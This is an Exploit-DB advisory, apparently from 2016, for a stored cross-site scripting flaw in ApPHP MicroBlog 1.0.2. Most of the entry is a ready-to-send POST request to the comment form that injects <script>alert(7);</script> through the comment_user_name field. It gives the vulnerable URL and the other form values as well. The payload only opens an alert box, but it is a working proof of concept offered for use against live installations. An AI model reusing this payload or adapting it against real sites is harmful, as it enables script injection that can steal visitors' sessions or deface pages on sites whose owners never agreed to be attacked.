ApPHP MicroBlog 1.0.2 - Persistent Cross-Site Scripting

Author: Besim
type: webapps
platform: php
port: 
date_added: 2016-10-11 
date_updated: 2016-10-14 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comphp_microblog_102.zip

# Exploit Title :              ApPHP MicroBlog 1.0.2  - Stored Cross
Site Scripting
# Author :                      Besim
# Google Dork :
# Date :                         12/10/2016
# Type :                         webapps
# Platform :                    PHP
# Vendor Homepage :   -
# Software link :            http://www.scriptdungeon.com/jump.php?ScriptID=9162

Description :

Vulnerable link : http://site_name/path/index.php?page=posts&post_id=

Stored XSS Payload ( Comments ): *

# Vulnerable URL :
http://site_name/path/index.php?page=posts&post_id= - Post comment section
# Vuln. Parameter : comment_user_name

############  POST DATA ############

task=publish_comment&article_id=69&user_id=&comment_user_name=<script>alert(7);</script>&comment_user_email=besimweptest@yopmail.com&comment_text=Besim&captcha_code=DKF8&btnSubmitPC=Publish
your comment

############ ######################